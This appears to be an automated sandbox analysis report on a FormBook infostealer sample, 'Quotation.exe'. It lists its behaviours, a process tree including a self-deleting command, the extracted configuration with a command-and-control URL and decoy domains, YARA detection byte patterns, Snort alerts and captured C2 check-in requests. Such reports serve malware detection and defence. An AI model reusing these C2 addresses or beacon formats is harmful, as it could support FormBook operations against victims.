Loading ...

Play interactive tourEdit tour

Analysis Report Quotation.exe

Overview

General Information

Sample Name:Quotation.exe
Analysis ID:383984
MD5:1f86caaa19912ceb55c9f6121eb692bb
SHA1:2d4dd95fdb17937b22a3d6a41862704ed80acf70
SHA256:8309d803c92faaf24828cd67e4c1041f9465ecf6c63f7608d7ed4579f075a02c
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Initial sample is a PE file and has a suspicious name
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Uses netsh to modify the Windows network and firewall settings
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Quotation.exe (PID: 6372 cmdline: 'C:\Users\user\Desktop\Quotation.exe' MD5: 1F86CAAA19912CEB55C9F6121EB692BB)
    • Quotation.exe (PID: 6424 cmdline: 'C:\Users\user\Desktop\Quotation.exe' MD5: 1F86CAAA19912CEB55C9F6121EB692BB)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • netsh.exe (PID: 6916 cmdline: C:\Windows\SysWOW64\netsh.exe MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
          • cmd.exe (PID: 7012 cmdline: /c del 'C:\Users\user\Desktop\Quotation.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.riceandginger.com/fcn/"], "decoy": ["bellee-select.com", "unlock-motorola.com", "courtneyrunyon.com", "hnzywjz.com", "retrievingbest.net", "ayescarrental.com", "beyoutifulblessings.com", "heritagediscovery.net", "fasoum.com", "wbz.xyz", "lownak.com", "alinkarmay.com", "coffeyquiltco.com", "validdreamers.com", "yuksukcu.club", "buildnextfrc.com", "avantfarme.com", "xyfs360.com", "holisticpacific.com", "banejia.com", "champsn.com", "ebitit.com", "esseneceedibles.com", "findmyautoparts.com", "belenusadvisory.net", "esrise.net", "lovewillfindaway.net", "chienluocmarketing.net", "greenbelieve.com", "shopyourgift.com", "theweddingofshadiandmike.com", "greenstavern.com", "klinku.com", "norastravel.com", "team5thgroup.com", "ohrchadash.com", "hauteandcood.com", "ap-333.com", "jonathantyar.com", "robertabraham.com", "citestaccnt1597691130.com", "665asilo.com", "deerokoj.com", "ezcovid19.com", "heritageivhoa.com", "ultraprecisiondata.com", "alkiefsaudi.com", "camelliaflowers.space", "clickqrcoaster.com", "ponorogokita.com", "stainlesslion.com", "china-ymc.com", "littner.xyz", "houseof2.com", "metabolytix.com", "1000-help6.club", "another-sc.com", "suafrisolac.com", "whitetreechainmail.com", "amazon-service-app-account.com", "cruiseameroca.com", "yaxett.net", "adsmat.com", "afternoontravel.site"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000001.237394511.0000000000400000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000001.237394511.0000000000400000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000001.237394511.0000000000400000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.278547391.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.278547391.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.1.Quotation.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.1.Quotation.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.1.Quotation.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18409:$sqlite3step: 68 34 1C 7B E1
        • 0x1851c:$sqlite3step: 68 34 1C 7B E1
        • 0x18438:$sqlite3text: 68 38 2A 90 C5
        • 0x1855d:$sqlite3text: 68 38 2A 90 C5
        • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
        1.2.Quotation.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.Quotation.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000001.00000001.237394511.0000000000400000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.riceandginger.com/fcn/"], "decoy": ["bellee-select.com", "unlock-motorola.com", "courtneyrunyon.com", "hnzywjz.com", "retrievingbest.net", "ayescarrental.com", "beyoutifulblessings.com", "heritagediscovery.net", "fasoum.com", "wbz.xyz", "lownak.com", "alinkarmay.com", "coffeyquiltco.com", "validdreamers.com", "yuksukcu.club", "buildnextfrc.com", "avantfarme.com", "xyfs360.com", "holisticpacific.com", "banejia.com", "champsn.com", "ebitit.com", "esseneceedibles.com", "findmyautoparts.com", "belenusadvisory.net", "esrise.net", "lovewillfindaway.net", "chienluocmarketing.net", "greenbelieve.com", "shopyourgift.com", "theweddingofshadiandmike.com", "greenstavern.com", "klinku.com", "norastravel.com", "team5thgroup.com", "ohrchadash.com", "hauteandcood.com", "ap-333.com", "jonathantyar.com", "robertabraham.com", "citestaccnt1597691130.com", "665asilo.com", "deerokoj.com", "ezcovid19.com", "heritageivhoa.com", "ultraprecisiondata.com", "alkiefsaudi.com", "camelliaflowers.space", "clickqrcoaster.com", "ponorogokita.com", "stainlesslion.com", "china-ymc.com", "littner.xyz", "houseof2.com", "metabolytix.com", "1000-help6.club", "another-sc.com", "suafrisolac.com", "whitetreechainmail.com", "amazon-service-app-account.com", "cruiseameroca.com", "yaxett.net", "adsmat.com", "afternoontravel.site"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\nsu4E63.tmp\laegtoh4.dllReversingLabs: Detection: 12%
          Multi AV Scanner detection for submitted fileShow sources
          Source: Quotation.exeReversingLabs: Detection: 22%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000001.237394511.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.278547391.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.496739110.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.497353357.0000000002E70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.497393185.0000000002EA0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.242716511.000000001EB40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.278753698.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.278664638.0000000000760000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.1.Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Quotation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Quotation.exe.1eb40000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Quotation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Quotation.exe.1eb40000.5.raw.unpack, type: UNPACKEDPE
          Source: 8.2.netsh.exe.2f15d18.2.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.1.Quotation.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 8.2.netsh.exe.398f834.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.2.Quotation.exe.1eb40000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.Quotation.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Quotation.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: netsh.pdb source: Quotation.exe, 00000001.00000002.278705852.0000000000799000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: Quotation.exe, 00000000.00000003.232762609.000000001ED00000.00000004.00000001.sdmp, Quotation.exe, 00000001.00000002.278883412.0000000000BD0000.00000040.00000001.sdmp, netsh.exe, 00000008.00000002.498460842.0000000003460000.00000040.00000001.sdmp
          Source: Binary string: netsh.pdbGCTL source: Quotation.exe, 00000001.00000002.278705852.0000000000799000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdb source: Quotation.exe, netsh.exe
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_0040531D DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00405CB0 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_004026BC FindFirstFileA,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 4x nop then pop esi
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4x nop then pop esi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 162.241.24.122:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 162.241.24.122:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 162.241.24.122:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49729 -> 198.54.117.216:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49729 -> 198.54.117.216:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49729 -> 198.54.117.216:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.riceandginger.com/fcn/
          Source: global trafficHTTP traffic detected: GET /fcn/?wZALH=PToxs4gHMXctdDo&ndsxlrp=SEmbethRuJUohlQz+Ttvx+iBOmYZkGVPsXZysf/6weMAgxRZQrWYJhCujRXBjoMPQ+uG HTTP/1.1Host: www.xyfs360.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fcn/?ndsxlrp=IIapObjlcsmN/tTUXuiVJ6SvcAdYVsMSy0eMvzJ/vGgposGY5YkWehqMwppvssjWa3vK&wZALH=PToxs4gHMXctdDo HTTP/1.1Host: www.riceandginger.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fcn/?wZALH=PToxs4gHMXctdDo&ndsxlrp=liB0icShPNod4xlpu/WXKffa+vmxvgDQmU6O7prVAXsGW3hWFkE60zcwKq/t6p2og2/V HTTP/1.1Host: www.houseof2.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fcn/?ndsxlrp=4nVmM3kokLOk5A5KPpUlNAhIJJn3COZ2tebCUHwKvxD3r3Ccio9dbVOfTPTbeaZZl4cM&wZALH=PToxs4gHMXctdDo HTTP/1.1Host: www.clickqrcoaster.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 198.54.117.216 198.54.117.216
          Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
          Source: Joe Sandbox ViewASN Name: DXTL-HKDXTLTseungKwanOServiceHK DXTL-HKDXTLTseungKwanOServiceHK
          Source: global trafficHTTP traffic detected: GET /fcn/?wZALH=PToxs4gHMXctdDo&ndsxlrp=SEmbethRuJUohlQz+Ttvx+iBOmYZkGVPsXZysf/6weMAgxRZQrWYJhCujRXBjoMPQ+uG HTTP/1.1Host: www.xyfs360.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fcn/?ndsxlrp=IIapObjlcsmN/tTUXuiVJ6SvcAdYVsMSy0eMvzJ/vGgposGY5YkWehqMwppvssjWa3vK&wZALH=PToxs4gHMXctdDo HTTP/1.1Host: www.riceandginger.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fcn/?wZALH=PToxs4gHMXctdDo&ndsxlrp=liB0icShPNod4xlpu/WXKffa+vmxvgDQmU6O7prVAXsGW3hWFkE60zcwKq/t6p2og2/V HTTP/1.1Host: www.houseof2.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fcn/?ndsxlrp=4nVmM3kokLOk5A5KPpUlNAhIJJn3COZ2tebCUHwKvxD3r3Ccio9dbVOfTPTbeaZZl4cM&wZALH=PToxs4gHMXctdDo HTTP/1.1Host: www.clickqrcoaster.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.xyfs360.com
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: netsh.exe, 00000008.00000002.501631169.0000000003E7F000.00000004.00000001.sdmpString found in binary or memory: http://www.NameBright.com
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: netsh.exe, 00000008.00000002.501631169.0000000003E7F000.00000004.00000001.sdmpString found in binary or memory: http://www.namebrightstatic.com/images/logo_off.gif)
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00404EBC GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000001.237394511.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.278547391.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.496739110.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.497353357.0000000002E70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.497393185.0000000002EA0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.242716511.000000001EB40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.278753698.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.278664638.0000000000760000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.1.Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Quotation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Quotation.exe.1eb40000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Quotation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Quotation.exe.1eb40000.5.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000001.00000001.237394511.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.237394511.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.278547391.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.278547391.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.496739110.0000000002BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.496739110.0000000002BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.497353357.0000000002E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.497353357.0000000002E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.497393185.0000000002EA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.497393185.0000000002EA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.242716511.000000001EB40000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.242716511.000000001EB40000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.278753698.00000000008D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.278753698.00000000008D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.278664638.0000000000760000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.278664638.0000000000760000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.Quotation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.Quotation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Quotation.exe.1eb40000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Quotation.exe.1eb40000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Quotation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
